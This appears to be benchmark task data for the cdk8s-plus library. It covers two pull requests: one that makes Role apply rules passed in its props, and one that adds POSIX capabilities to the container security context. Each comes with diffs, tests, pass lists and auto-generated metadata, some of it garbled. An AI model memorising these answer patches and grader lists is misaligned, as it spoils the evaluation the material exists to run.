Method: Role.constructor(scope: Construct, id: string, props?: RoleProps) Location: src/role.ts Inputs: - scope – the construct tree parent (e.g., a Chart) where the Role will be added. - id – logical identifier for the Role within the scope. - props (optional) – RoleProps where the new optional field `rules?: Array<{ verbs: string[], resources: ApiResource[] }>` can be supplied to declare policy rules directly at construction time. Outputs: - Returns a new `Role` instance. The supplied `rules` are automatically converted to Kubernetes RBAC rules and emitted in the synthesized manifest under `rules` (each rule rendered with `apiGroups`, `resources`, and `verbs`). Description: Creates a Kubernetes Role resource. In addition to the existing properties, the constructor now accepts a `rules` array that allows callers to specify access rules up‑front, which are internally added via `allow` and appear in the generated manifest. This is exercised in the test by constructing a Role with a `rules` prop and asserting the rendered rule structure.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3813", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue title indicates a fix is needed so that Role respects rules passed via roleProps, but the issue description provides no details or acceptance criteria. The added test defines the expected behavior, and the change in src/role.ts directly satisfies that test without affecting other modules. Because the specification is ambiguous in the issue text and relies on the test for clarification, this is a B4 (AMBIGUOUS_SPEC) case.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a428ad09333243488c0bc1e88b034433bfd404ab
2024-04-18 07:26:16
cdk8s-team__cdk8s-plus-4047
diff --git a/src/role.ts b/src/role.ts index bdf4eb93..0da4b118 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps (#3813) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [fix(role): use rules coming from the roleProps (#3813)](https://github.com/cdk8s-team/cdk8s-plus/pull/3813) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Respect `rules` supplied through `Role` properties **Problem** When creating a Role, any rule definitions passed via its props were silently ignored, resulting in incomplete RBAC specifications. This caused roles to lack the intended permissions despite being declared. **Root Cause** The constructor only set up a lazy rule generator and never processed the explicit `rules` array from the provided properties. **Fix / Expected Behavior** - Iterate over the `rules` array supplied in the role’s properties during construction. - Register each rule using the same mechanism that regular `allow` calls use. - Preserve existing lazy rule synthesis for dynamically added permissions. - Ensure the final Role manifest includes all explicitly provided rules. **Risk & Validation** - Verify that adding explicit rules does not interfere with later incremental `allow` calls or duplicate rule handling. - Run the full test suite, including RBAC serialization tests, to confirm that generated Role manifests now contain the expected rule entries. - Add/extend tests that create a Role with predefined rules and assert their presence in the output.
4,047
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can mutate metadata", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "default configuration", "custom configuration", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "auto mounting token can be disabled", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "role can bind to imported", "secrets can be added to the service account", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host" ]
Method: Role.__init__(self, chart: Chart, id: str, props: RoleProps = None) Location: src/role.ts Inputs: chart – the CDK8s chart the role belongs to; id – logical identifier for the role; props (optional) – may contain a **rules** field, which is a list of objects each specifying `verbs: str[]` and `resources: ApiResource[]`. The constructor now iterates over `props.rules` (if provided) and calls `allow` for each rule. Outputs: a new Role instance that is added to the chart and synthesizes the supplied rules into the manifest. Description: Constructs a Role resource, automatically granting the listed permissions during construction when `props.rules` is supplied.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.87, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3813", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that Role use rules supplied via roleProps, but the issue text provides no explicit acceptance criteria or description of the expected behavior, making the intent only partially described. The added test asserts that a 'rules' prop is processed and results in manifest rules, which is not mentioned in the issue, indicating a misalignment between test expectations and the issue specification. This lack of clear specification is a classic ambiguous spec problem, fitting B4. No other B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects Role constructor to accept a 'rules' property and translate it into manifest rules, which is not described in the issue text." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a4f6d8e8faadf14d0b453761a1944464456854d7
2024-04-18 07:32:24
cdk8s-team__cdk8s-plus-4048
diff --git a/src/container.ts b/src/container.ts index e5940b92..2fcca1e5 100644 --- a/src/container.ts +++ b/src/container.ts @@ -7,6 +7,188 @@ import * as secret from './secret'; import { undefinedIfEmpty } from './utils'; import * as volume from './volume'; +/** + * Capability - complete list of POSIX capabilities + */ +export enum Capability { + /** + * CAP_AUDIT_CONTROL + */ + AUDIT_CONTROL = 'CAP_AUDIT_CONTROL', + /** + * CAP_AUDIT_READ + */ + AUDIT_READ = 'CAP_AUDIT_READ', + /** + * CAP_AUDIT_WRITE + */ + AUDIT_WRITE = 'CAP_AUDIT_WRITE', + /** + * CAP_BLOCK_SUSPEND + */ + BLOCK_SUSPEND = 'CAP_BLOCK_SUSPEND', + /** + * CAP_BPF + */ + BPF = 'CAP_BPF', + /** + * CAP_CHECKPOINT_RESTORE + */ + CHECKPOINT_RESTORE = 'CAP_CHECKPOINT_RESTORE', + /** + * CAP_CHOWN + */ + CHOWN = 'CAP_CHOWN', + /** + * CAP_DAC_OVERRIDE + */ + DAC_OVERRIDE = 'CAP_DAC_OVERRIDE', + /** + * CAP_DAC_READ_SEARCH + */ + DAC_READ_SEARCH = 'CAP_DAC_READ_SEARCH', + /** + * CAP_FOWNER + */ + FOWNER = 'CAP_FOWNER', + /** + * CAP_FSETID + */ + FSETID = 'CAP_FSETID', + /** + * CAP_IPC_LOCK + */ + IPC_LOCK = 'CAP_IPC_LOCK', + /** + * CAP_IPC_OWNER + */ + IPC_OWNER = 'CAP_IPC_OWNER', + /** + * CAP_KILL + */ + KILL = 'CAP_KILL', + /** + * CAP_LEASE + */ + LEASE = 'CAP_LEASE', + /** + * CAP_LINUX_IMMUTABLE + */ + LINUX_IMMUTABLE = 'CAP_LINUX_IMMUTABLE', + /** + * CAP_MAC_ADMIN + */ + MAC_ADMIN = 'CAP_MAC_ADMIN', + /** + * CAP_MAC_OVERRIDE + */ + MAC_OVERRIDE = 'CAP_MAC_OVERRIDE', + /** + * CAP_MKNOD + */ + MKNOD = 'CAP_MKNOD', + /** + * CAP_NET_ADMIN + */ + NET_ADMIN = 'CAP_NET_ADMIN', + /** + * CAP_NET_BIND_SERVICE + */ + NET_BIND_SERVICE = 'CAP_NET_BIND_SERVICE', + /** + * CAP_NET_BROADCAST + */ + NET_BROADCAST = 'CAP_NET_BROADCAST', + /** + * CAP_NET_RAW + */ + NET_RAW = 'CAP_NET_RAW', + /** + * CAP_PERFMON + */ + PERFMON = 'CAP_PERFMON', + /** + * CAP_SETGID + */ + SETGID = 'CAP_SETGID', + /** + * CAP_SETFCAP + */ + SETFCAP = 'CAP_SETFCAP', + /** + * CAP_SETPCAP + */ + SETPCAP = 'CAP_SETPCAP', + /** + * CAP_SETUID + */ + SETUID = 'CAP_SETUID', + /** + * CAP_SYS_ADMIN + */ + SYS_ADMIN = 'CAP_SYS_ADMIN', + /** + * CAP_SYS_BOOT + */ + SYS_BOOT = 'CAP_SYS_BOOT', + /** + * CAP_SYS_CHROOT + */ + SYS_CHROOT = 'CAP_SYS_CHROOT', + /** + * CAP_SYS_MODULE + */ + SYS_MODULE = 'CAP_SYS_MODULE', + /** + * CAP_SYS_NICE + */ + SYS_NICE = 'CAP_SYS_NICE', + /** + * CAP_SYS_PACCT + */ + SYS_PACCT = 'CAP_SYS_PACCT', + /** + * CAP_SYS_PTRACE + */ + SYS_PTRACE = 'CAP_SYS_PTRACE', + /** + * CAP_SYS_RAWIO + */ + SYS_RAWIO = 'CAP_SYS_RAWIO', + /** + * CAP_SYS_RESOURCE + */ + SYS_RESOURCE = 'CAP_SYS_RESOURCE', + /** + * CAP_SYS_TIME + */ + SYS_TIME = 'CAP_SYS_TIME', + /** + * CAP_SYS_TTY_CONFIG + */ + SYS_TTY_CONFIG = 'CAP_SYS_TTY_CONFIG', + /** + * CAP_SYSLOG + */ + SYSLOG = 'CAP_SYSLOG', + /** + * CAP_WAKE_ALARM + */ + WAKE_ALARM = 'CAP_WAKE_ALARM', +} + +export interface ContainerSecutiryContextCapabilities { + /** + * Added capabilities + */ + readonly add?: Capability[]; + + /** + * Removed capabilities + */ + readonly drop?: Capability[]; +} + /** * Properties for `ContainerSecurityContext` */ @@ -59,6 +241,13 @@ export interface ContainerSecurityContextProps { * @default false */ readonly allowPrivilegeEscalation?: boolean; + + /** + * POSIX capabilities for running containers + * + * @default none + */ + readonly capabilities?: ContainerSecutiryContextCapabilities; } /** @@ -137,6 +326,7 @@ export class ContainerSecurityContext { public readonly user?: number; public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; + public readonly capabilities?: ContainerSecutiryContextCapabilities; constructor(props: ContainerSecurityContextProps = {}) { this.ensureNonRoot = props.ensureNonRoot ?? true; @@ -145,6 +335,7 @@ export class ContainerSecurityContext { this.user = props.user; this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; + this.capabilities = props.capabilities; } /** @@ -158,6 +349,7 @@ export class ContainerSecurityContext { privileged: this.privileged, readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, + capabilities: this.capabilities, }; } @@ -330,7 +522,7 @@ export class EnvValue { * @param key - The key to extract the value from. * @param options - Additional options. */ - public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = { }): EnvValue { + public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = {}): EnvValue { const source: k8s.EnvVarSource = { configMapKeyRef: { @@ -432,7 +624,7 @@ export class EnvValue { return EnvValue.fromValue(value!); } - private constructor(public readonly value?: any, public readonly valueFrom?: any) {} + private constructor(public readonly value?: any, public readonly valueFrom?: any) { } } export enum ImagePullPolicy { @@ -846,7 +1038,7 @@ export class Container { * @param path - The desired path in the container. * @param storage - The storage to mount. */ - public mount(path: string, storage: volume.IStorage, options: MountOptions = { }) { + public mount(path: string, storage: volume.IStorage, options: MountOptions = {}) { this.mounts.push({ path, volume: storage.asVolume(), ...options }); } @@ -1131,7 +1323,7 @@ export class EnvFrom { constructor( private readonly configMap?: configmap.IConfigMap, private readonly prefix?: string, - private readonly sec?: secret.ISecret) {}; + private readonly sec?: secret.ISecret) { }; /** * @internal
feat(container): add capabilities to security context (#3817) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(container): add capabilities to security context (#3817)](https://github.com/cdk8s-team/cdk8s-plus/pull/3817) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add POSIX capability configuration to container security context **Problem** Users cannot currently specify Linux capabilities to add or drop when defining a container’s security context, limiting fine‑grained privilege control. **Root Cause** The security context model does not expose any field for capabilities, so the underlying manifest never includes them. **Fix / Expected Behavior** - Introduce a representation of all supported POSIX capabilities. - Provide a structure for declaring capabilities to add and/or drop. - Extend the container security context API to accept this new capabilities configuration. - Ensure the capabilities section is serialized into the generated pod spec when supplied. - Preserve existing behavior when no capabilities are defined. **Risk & Validation** - Verify that adding the new fields does not alter the output of existing manifests (regression test). - Add tests that confirm the correct rendering of `add` and `drop` capabilities in the security context. - Run the full test suite to ensure no breakage in unrelated components.
4,048
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 4d570d58..bf349bc1 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -777,6 +777,7 @@ test('default security context', () => { runAsNonRoot: container.securityContext.ensureNonRoot, runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, + capabilities: container.securityContext.capabilities, }); }); @@ -790,6 +791,14 @@ test('custom security context', () => { privileged: true, user: 1000, group: 2000, + capabilities: { + add: [ + Capability.AUDIT_CONTROL, + ], + drop: [ + Capability.BPF, + ], + }, }, }); @@ -798,6 +807,8 @@ test('custom security context', () => { expect(container.securityContext.readOnlyRootFilesystem).toBeTruthy(); expect(container.securityContext.user).toEqual(1000); expect(container.securityContext.group).toEqual(2000); + expect(container.securityContext.capabilities?.add).toEqual(['CAP_AUDIT_CONTROL']); + expect(container.securityContext.capabilities?.drop).toEqual(['CAP_BPF']); });
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
